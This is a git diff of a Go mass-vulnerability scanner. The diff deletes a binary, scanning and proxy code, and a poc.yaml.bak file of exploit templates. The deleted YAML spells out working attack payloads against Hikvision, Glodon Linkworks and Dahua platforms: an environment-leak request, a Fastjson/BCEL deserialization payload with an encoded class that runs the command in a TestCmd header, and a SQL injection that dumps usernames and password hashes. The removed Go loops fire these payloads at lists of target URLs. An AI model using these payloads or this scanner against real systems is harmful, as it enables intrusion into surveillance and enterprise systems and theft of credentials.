diff --git a/check2023.exe b/check2023.exe
deleted file mode 100644
index 58d2f3c..0000000
Binary files a/check2023.exe and /dev/null differ
diff --git a/check_demo/start_poc.go b/check_demo/start_poc.go
index 35a8685..447fc70 100644
--- a/check_demo/start_poc.go
+++ b/check_demo/start_poc.go
@@ -27,275 +27,6 @@ func Start(rch chan string, wch chan string, bch chan bool, client *http.Client,
var r response
var params map[string]interface{}
- for url := range rch {
- select {
- case <-ctx.Done():
- default:
- poc, err := poc.GetYamlFile("./poc/poc.yaml")
- if err != nil {
- fmt.Println(err)
- colorOutput.Colorful.WithFrontColor("red").Println("[*] 读取yaml文件出错")
- continue
- }
- for _, v := range poc.Poc_content {
- var req *http.Request
- var body io.Reader
- var err error
- if v.Rules.Rule0.Requests0.Method0 != "GET" && v.Rules.Rule0.Requests0.Method0 != "POST" {
- continue
- }
- if v.Rules.Rule0.Requests0.Method0 == "GET" || v.Rules.Rule0.Requests0.Method0 == "POST" {
- // allow_redirects := v.Rules.Rule.Requests.Allow_redirects
- path := v.Rules.Rule0.Requests0.Path0
- headers := v.Rules.Rule0.Requests0.Headers0
- allowRedirect = v.Rules.Rule0.Requests0.Allow_redirects0
- if v.Rules.Rule0.Requests0.Method0 == "GET" {
- req, err = http.NewRequest("GET", url+path, nil)
- } else {
- body = bytes.NewReader([]byte(v.Rules.Rule0.Requests0.Body0))
- req, err = http.NewRequest("POST", url+path, body)
- }
-
- if err != nil {
- colorOutput.Colorful.WithFrontColor("red").Println("[*] " + url + "http.NewRequest 请求错误,请检测网络是否可达!!!")
- continue
- }
-
- // 设置请求头部信息
- if headers.User_Agent0 != "" {
- req.Header.Set("User-Agent", headers.User_Agent0)
- }
- if headers.Content_Type0 != "" {
- req.Header.Set("Content-Type", headers.Content_Type0)
- }
- if headers.Cookie0 != "" {
- cookie := &http.Cookie{
- Name: "Cookie",
- Value: headers.Cookie0,
- }
- req.AddCookie(cookie)
- }
- if headers.TestCMD0 != "" {
- req.Header.Set("TestCmd", headers.TestCMD0)
- }
- } else {
- continue
- }
-
- // 设置 client 的 CheckRedirect 字段
- client.CheckRedirect = func(req *http.Request, via []*http.Request) error {
- if !allowRedirect {
- return http.ErrUseLastResponse
- }
- return nil
- }
-
- resp, err := client.Do(req)
- if err != nil {
- //colorOutput.Colorful.WithFrontColor("red").Println("[*] " + url + " client.Do请求错误,请检测网络是否可达!!!")
- continue
- }
- defer resp.Body.Close()
-
- respBody, err := io.ReadAll(resp.Body)
- if err != nil {
- colorOutput.Colorful.WithFrontColor("red").Println("[*] io.ReadAll(resp.Body)出错!!!")
- continue
- }
-
- matchers0 := v.Rules.Rule0.Matchers0
- if matchers0 != "" && !strings.Contains(matchers0, "Set-Cookie") {
- r = response{
- Text: string(respBody),
- StatusCode: resp.StatusCode,
- }
- params = map[string]interface{}{
- "r.Text": r.Text,
- "r.StatusCode": r.StatusCode,
- }
- result, err := evaluate(matchers0, params)
- if err != nil {
- colorOutput.Colorful.WithFrontColor("red").Println(err)
- continue
- }
-
- if result {
- rs := "[+] " + url + " | 存在" + v.Info.Name
- wch <- rs
- } else {
- continue
- }
- } else if strings.Contains(matchers0, "Set-Cookie") {
- new_cookie := resp.Header.Get("Set-Cookie")
- if v.Rules.Rule1.Requests1.Method1 == "GET" || v.Rules.Rule1.Requests1.Method1 == "POST" {
- path1 := v.Rules.Rule1.Requests1.Path1
- headers1 := v.Rules.Rule1.Requests1.Headers1
- if v.Rules.Rule1.Requests1.Method1 == "GET" {
- req, err = http.NewRequest("GET", url+path1, nil)
- } else {
- body = bytes.NewReader([]byte(v.Rules.Rule1.Requests1.Body1))
- req, err = http.NewRequest("POST", url+path1, body)
- }
-
- if err != nil {
- colorOutput.Colorful.WithFrontColor("red").Println("[*] " + url + "http.NewRequest 请求错误,请检测网络是否可达!!!")
- continue
- }
- if headers1.User_Agent1 != "" {
- req.Header.Set("User-Agent", headers1.User_Agent1)
- }
- if headers1.Content_Type1 != "" {
- req.Header.Set("Content-Type", headers1.Content_Type1)
- }
-
- req.Header.Set("Cookie", new_cookie)
-
- if headers1.TestCMD1 != "" {
- req.Header.Set("TestCmd", headers1.TestCMD1)
- }
- } else {
- continue
- }
- // 设置 client 的 CheckRedirect 字段
- client.CheckRedirect = func(req *http.Request, via []*http.Request) error {
- if !allowRedirect {
- return http.ErrUseLastResponse
- }
- return nil
- }
-
- resp1, err := client.Do(req)
- if err != nil {
- //colorOutput.Colorful.WithFrontColor("red").Println("[*] " + url + " client.Do请求错误,请检测网络是否可达!!!")
- continue
- }
- defer resp1.Body.Close()
-
- respBody1, err := io.ReadAll(resp1.Body)
- if err != nil {
- colorOutput.Colorful.WithFrontColor("red").Println("[*] io.ReadAll(resp1.Body)出错!!!")
- continue
- }
-
- matchers1 := v.Rules.Rule1.Matchers1
- if matchers1 != "" {
- r = response{
- Text: string(respBody1),
- StatusCode: resp1.StatusCode,
- }
- params = map[string]interface{}{
- "r.Text": r.Text,
- "r.StatusCode": r.StatusCode,
- }
- result, err := evaluate(matchers1, params)
- if err != nil {
- s := fmt.Sprintf("[*] %v/%v", url, err)
- colorOutput.Colorful.WithFrontColor("blue").Println(s)
- continue
- }
-
- if result {
- rs := "[+] " + url + " | 存在" + v.Info.Name
- wch <- rs
- } else {
- continue
- }
- }
-
- } else {
- if v.Rules.Rule1.Requests1.Method1 == "GET" || v.Rules.Rule1.Requests1.Method1 == "POST" {
- path1 := v.Rules.Rule1.Requests1.Path1
- headers1 := v.Rules.Rule1.Requests1.Headers1
- if v.Rules.Rule1.Requests1.Method1 == "GET" {
- req, err = http.NewRequest("GET", url+path1, nil)
- } else {
- body = bytes.NewReader([]byte(v.Rules.Rule1.Requests1.Body1))
- req, err = http.NewRequest("POST", url+path1, body)
- }
-
- if err != nil {
- colorOutput.Colorful.WithFrontColor("red").Println("[*] " + url + "http.NewRequest 请求错误,请检测网络是否可达!!!")
- continue
- }
- if headers1.User_Agent1 != "" {
- req.Header.Set("User-Agent", headers1.User_Agent1)
- }
- if headers1.Content_Type1 != "" {
- req.Header.Set("Content-Type", headers1.Content_Type1)
- }
-
- if headers1.Cookie1 != "" {
- cookie := &http.Cookie{
- Name: "Cookie",
- Value: headers1.Cookie1,
- }
- req.AddCookie(cookie)
- }
-
- if headers1.TestCMD1 != "" {
- req.Header.Set("TestCmd", headers1.TestCMD1)
- }
- } else {
- continue
- }
- }
- // 设置 client 的 CheckRedirect 字段
- client.CheckRedirect = func(req *http.Request, via []*http.Request) error {
- if !allowRedirect {
- return http.ErrUseLastResponse
- }
- return nil
- }
-
- resp1, err := client.Do(req)
- if err != nil {
- //colorOutput.Colorful.WithFrontColor("red").Println("[*] " + url + " client.Do请求错误,请检测网络是否可达!!!")
- continue
- }
- defer resp1.Body.Close()
-
- respBody1, err := io.ReadAll(resp1.Body)
- if err != nil {
- colorOutput.Colorful.WithFrontColor("red").Println("[*] io.ReadAll(resp1.Body)出错!!!")
- continue
- }
-
- matchers1 := v.Rules.Rule1.Matchers1
- if matchers1 != "" {
- r = response{
- Text: string(respBody1),
- StatusCode: resp1.StatusCode,
- }
- params = map[string]interface{}{
- "r.Text": r.Text,
- "r.StatusCode": r.StatusCode,
- }
- result, err := evaluate(matchers1, params)
- if err != nil {
- s := fmt.Sprintf("%v/%v", url, err)
- colorOutput.Colorful.WithFrontColor("red").Println(s)
- continue
- }
-
- if result {
- rs := "[+] " + url + " | 存在" + v.Info.Name
- wch <- rs
- } else {
- continue
- }
- }
-
- }
-
- }
- }
- bch <- true
-}
-
-func Start1(rch chan string, wch chan string, bch chan bool, client *http.Client, ctx context.Context, allowRedirect bool) {
- var r response
- var params map[string]interface{}
-
for url := range rch {
select {
case <-ctx.Done():
@@ -641,33 +372,6 @@ func PrintRS(ch chan string, ctx context.Context, rss *[]string) {
}
}
-func containsAll(str string, slice []string) bool {
- for _, item := range slice {
- if !strings.Contains(str, item) {
- return false
- }
- }
- return true
-}
-
-func evaluateExpression(expr string, params map[string]interface{}) (bool, error) {
- expression, err := govaluate.NewEvaluableExpression(expr)
- if err != nil {
- return false, err
- }
-
- result, err := expression.Evaluate(params)
- if err != nil {
- return false, err
- }
-
- evalResult, ok := result.(bool)
- if !ok {
- return false, fmt.Errorf("Expression does not evaluate to a boolean result")
- }
-
- return evalResult, nil
-}
func evaluate(expr string, params map[string]interface{}) (bool, error) {
functions := map[string]govaluate.ExpressionFunction{
diff --git a/http_client/client.go b/http_client/client.go
index b4f80d7..4fd8275 100644
--- a/http_client/client.go
+++ b/http_client/client.go
@@ -1,13 +1,8 @@
package http_client
import (
- "context"
"crypto/tls"
- "encoding/json"
"fmt"
- "io"
- "io/ioutil"
- "net"
"net/http"
"net/url"
"os"
@@ -30,137 +25,6 @@ func GetClient() *http.Client {
return client
}
-func GetClientProxy(proxyStr string) *http.Client {
- proxyURL, _ := url.Parse(proxyStr)
- tr := &http.Transport{
- TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
- Proxy: http.ProxyURL(proxyURL),
- }
- client := &http.Client{
- Transport: tr,
- Timeout: time.Second * 2,
- }
-
- return client
-}
-
-func HttpProxy(proxyStr, user, pwd string) *http.Client {
- defer func() {
- if err := recover(); err != nil {
- fmt.Println(time.Now().Format("2006-01-02 15:04:05"), "http", err)
- }
- }()
-
- urli := url.URL{}
-
- if !strings.Contains(proxyStr, "http") {
- proxyStr = fmt.Sprintf("http://%s", proxyStr)
- }
-
- //proxyURL, _ := url.Parse(proxyStr)
- proxyURL, _ := urli.Parse(proxyStr)
-
- if user != "" && pwd != "" {
- proxyURL.User = url.UserPassword(user, pwd)
- }
-
- client := &http.Client{
- Transport: &http.Transport{
- Proxy: http.ProxyURL(proxyURL),
- },
- Timeout: time.Second * 2,
- }
-
- return client
-}
-
-func Socks5Proxy(proxyStr, user, pwd string) *http.Client {
- defer func() {
- if err := recover(); err != nil {
- fmt.Println(time.Now().Format("2006-01-02 15:04:05"), "http", err)
- }
- }()
-
- var userAuth proxy.Auth
- if user != "" && pwd != "" {
- userAuth.User = user
- userAuth.Password = pwd
- }
-
- dialer, err := proxy.SOCKS5("tcp", proxyStr, &userAuth, proxy.Direct)
- if err != nil {
- fmt.Println("proxy.SOCKS5 err:", err)
- }
-
- client := &http.Client{
- Transport: &http.Transport{
- DialContext: func(ctx context.Context, network, addr string) (conn net.Conn, err error) {
- return dialer.Dial(network, addr)
- },
- },
- Timeout: time.Second * 2,
- }
-
- return client
-}
-
-func GetNetIP() {
- resp, err := http.Get("https://api.myip.la/en?json")
- if err != nil {
- fmt.Println("获取本机ip失败:", err)
- return
- }
- defer resp.Body.Close()
-
- body, err2 := ioutil.ReadAll(resp.Body)
- if err != nil {
- fmt.Println(err2.Error())
- return
- }
-
- //fmt.Println(string(body))
- fmt.Println(strings.Split(strings.Split(string(body), ",")[0], "{")[1])
- //fmt.Println(strings.Split(strings.Split(strings.Split(string(body), ",")[0],"{")[1],":")[1])
-}
-
-func proxyWithAuth(username, password, proxyStr string) *url.URL {
- //创建代理
- if !strings.Contains(proxyStr, "http") {
- proxyStr = fmt.Sprintf("http://%s", proxyStr)
- }
- proxyURL, err := url.Parse(proxyStr)
- if err != nil {
- fmt.Println("无法解析代理URL:", err)
- os.Exit(1)
- }
-
- //解析代理的鉴权信息
- proxyURL.User = url.UserPassword(username, password)
- return proxyURL
-}
-
-func ClientWithAuth(username, password, proxyStr string) *http.Client {
- transport := &http.Transport{
- Proxy: http.ProxyURL(proxyWithAuth(username, password, proxyStr)),
- }
-
- client := &http.Client{
- Transport: transport,
- Timeout: time.Second * 5,
- }
-
- return client
-}
-
-func ResultMap(response *http.Response) (map[string]interface{}, error) {
- var result map[string]interface{}
- body, err := io.ReadAll(response.Body)
- if err == nil {
- err = json.Unmarshal(body, &result)
- }
- return result, err
-}
-
func GetClientFromPool(pool *sync.Pool) *http.Client {
return pool.Get().(*http.Client)
}
diff --git a/main.go b/main.go
index 5a94235..60643f2 100644
--- a/main.go
+++ b/main.go
@@ -12,7 +12,6 @@ import (
"xyz/colorOutput"
"xyz/http_client"
"xyz/toexcel"
- "xyz/tools"
)
func main() {
@@ -61,7 +60,7 @@ func main() {
//go check_demo.Start(urlFileChan, rsChan, exitChan, client, ctx)
go func() {
defer wg.Done()
- check_demo.Start1(urlFileChan, rsChan, exitChan, http_client.GetClientFromPool(&clientPool), ctx, allowRedirect)
+ check_demo.Start(urlFileChan, rsChan, exitChan, http_client.GetClientFromPool(&clientPool), ctx, allowRedirect)
}()
}
@@ -126,116 +125,3 @@ func main() {
s := fmt.Sprintf("[本次扫描完成,任务总用时:%v]", end.Sub(start))
colorOutput.Colorful.WithFrontColor("purple").Println(s)
}
-
-func main01() {
- file, proxyIp, proxyPort, username, password, outFile, threads := parse.Get_Parse()
- parse.Banner()
-
- colorOutput.Colorful.WithFrontColor("blue").Println("……………………………………………………………………………………………………请耐心等待扫描马上开始…………………………………………………………………………………………………………………")
- colorOutput.Colorful.WithFrontColor("blue").Println("============================================checking===================================================")
-
- start := time.Now()
-
- var urlFileChan = make(chan string)
- var rsChan = make(chan string)
- var exitChan = make(chan bool, threads)
- var rs []string
- var wg sync.WaitGroup
- var allowRedirect bool
- //var rsCounter int32
- var clientPool sync.Pool
-
- if proxyIp != "" && proxyPort != "" {
- proxyStr := fmt.Sprintf("http://%s:%s", proxyIp, proxyPort)
- if username != "" && password != "" {
- //client = http_client.ClientWithAuth(username, password, proxyStr)
- clientPool.New = func() interface{} {
- return http_client.ClientWithAuth(username, password, proxyStr)
- }
- } else {
- //client = http_client.GetClientProxy(proxyStr)
- clientPool.New = func() interface{} {
- return http_client.GetClientProxy(proxyStr)
- }
- }
- } else {
- //client = http_client.GetClient()
- clientPool.New = func() interface{} {
- return http_client.GetClient()
- }
- }
-
- ctx, cancel := context.WithCancel(context.Background())
-
- wg.Add(1)
- //go check_demo.Put_URL(urlFileChan, file, ctx)
- go func() {
- defer wg.Done()
- check_demo.Put_URL(http_client.GetClientFromPool(&clientPool), urlFileChan, file, ctx)
- }()
-
- for i := 0; i < threads; i++ {
- wg.Add(1)
- //go check_demo.Start(urlFileChan, rsChan, exitChan, client, ctx)
- go func() {
- defer wg.Done()
- check_demo.Start(urlFileChan, rsChan, exitChan, http_client.GetClientFromPool(&clientPool), ctx, allowRedirect)
- }()
- }
-
- // wg.Add(1)
- // go func() {
- // defer wg.Done()
- // for v := range rsChan {
- // atomic.AddInt32(&rsCounter, 1)
- // rs = append(rs, v)
- // }
- // }()
-
- wg.Add(1)
- //go check_demo.PrintRS(rsChan, &wg)
- go func() {
- defer wg.Done()
- check_demo.PrintRS(rsChan, ctx, &rs)
- }()
-
- wg.Add(1)
- go func() {
- defer wg.Done()
- for i := 0; i < threads; i++ {
- <-exitChan
- }
- close(rsChan)
- }()
-
- wg.Wait()
- cancel()
-
- if outFile != "" {
- var content = [][]interface{}{
- {"序号", "结果列表"},
- }
- for index, result := range rs {
- content = append(content, []interface{}{index + 1, result})
- }
- t := time.Now().Format("20060102")
- err := toexcel.SaveToExcel(t+outFile, "漏洞扫描结果", content, "A", "B", [2]string{"B", "B"}, 100)
- if err != nil {
- s := fmt.Sprintf("[*] 保存excel文件出错:%v", err)
- colorOutput.Colorful.WithFrontColor("red").Println(s)
- }
- }
- end := time.Now()
- colorOutput.Colorful.WithFrontColor("blue").Println("==============================================end======================================================")
- s := fmt.Sprintf("[本次扫描完成,任务总用时:%v]", end.Sub(start))
- colorOutput.Colorful.WithFrontColor("purple").Println(s)
- // fmt.Scanln()
- // os.Exit(0)
-}
-
-func main1() {
- str := ""
-
- s := tools.Base64Decode(str)
- fmt.Println(s)
-}
diff --git a/poc/poc.yaml.bak b/poc/poc.yaml.bak
deleted file mode 100644
index 3a392c4..0000000
--- a/poc/poc.yaml.bak
+++ /dev/null
@@ -1,2156 +0,0 @@
-# 添加POC时注意特殊字符的转义
-# matchers目前可以匹配三个自定义函数:
-### containsFunc(r\\.Text, \"bootstrapProperties\") 字符串匹配
-### equalsFunc(r\\.StatusCode, 200) 状态码匹配
-### regexFunc(\"[0-9a-fA-F]{32}\", r\\.Text) 正则匹配
-poc_content:
- - id: "HiKVISION综合安防管理平台env信息泄漏"
- info:
- name: "HiKVISION综合安防管理平台env信息泄漏"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"HIKVISION-综合安防管理平台\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/artemis-portal/artemis/env"
- allow_redirects: false
- headers:
- content-type: "application/json"
- user-agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"bootstrapProperties\") && containsFunc(r\\.Text, \"profiles\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects:
- headers:
- content-type: ""
- user-agent: ""
- cookie: ""
- TestCmd: ""
- body: ""
- matchers:
-
- - id: "海康综合安防管理平台反序列化"
- info:
- name: "海康综合安防管理平台反序列化"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"HIKVISION-综合安防管理平台\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/bic/ssoService/v1/keepAlive"
- allow_redirects: false
- headers:
- content-type: "application/json"
- user-agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
- cookie: ""
- TestCmd: "ipconfig"
- body: "{\"CTGT\":{ \"a\": {\"@type\": \"java.lang.Class\",\"val\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\"},\"b\": {\"@type\": \"java.lang.Class\",\"val\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"c\": {\"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\"driverClassLoader\": {\"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"driverClassName\": \"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A\"}}}"
- matchers: "containsFunc(r\\.Text, \"Windows IP\")"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects:
- headers:
- content-type: ""
- user-agent: ""
- cookie: ""
- TestCmd: ""
- body: ""
- matchers:
-
- - id: "广联达Linkworks_GetIMDictionary_SQL"
- info:
- name: "广联达Linkworks_GetIMDictionary_SQL注入"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "body=\"/Services/Identification/\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary"
- allow_redirects: false
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: "key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --"
- matchers: "regexFunc(\"[0-9a-fA-F]{32}\", r\\.Text)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects:
- headers:
- content-type: ""
- user-agent: ""
- cookie: ""
- TestCmd: ""
- body: ""
- matchers:
-
- - id: "大华智慧园区综合管理平台SQL"
- info:
- name: "大华智慧园区综合管理平台SQL注入"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"dahua-智慧园区综合管理平台\""
- rules:
- rule0:
- requests:
- method: "GET"
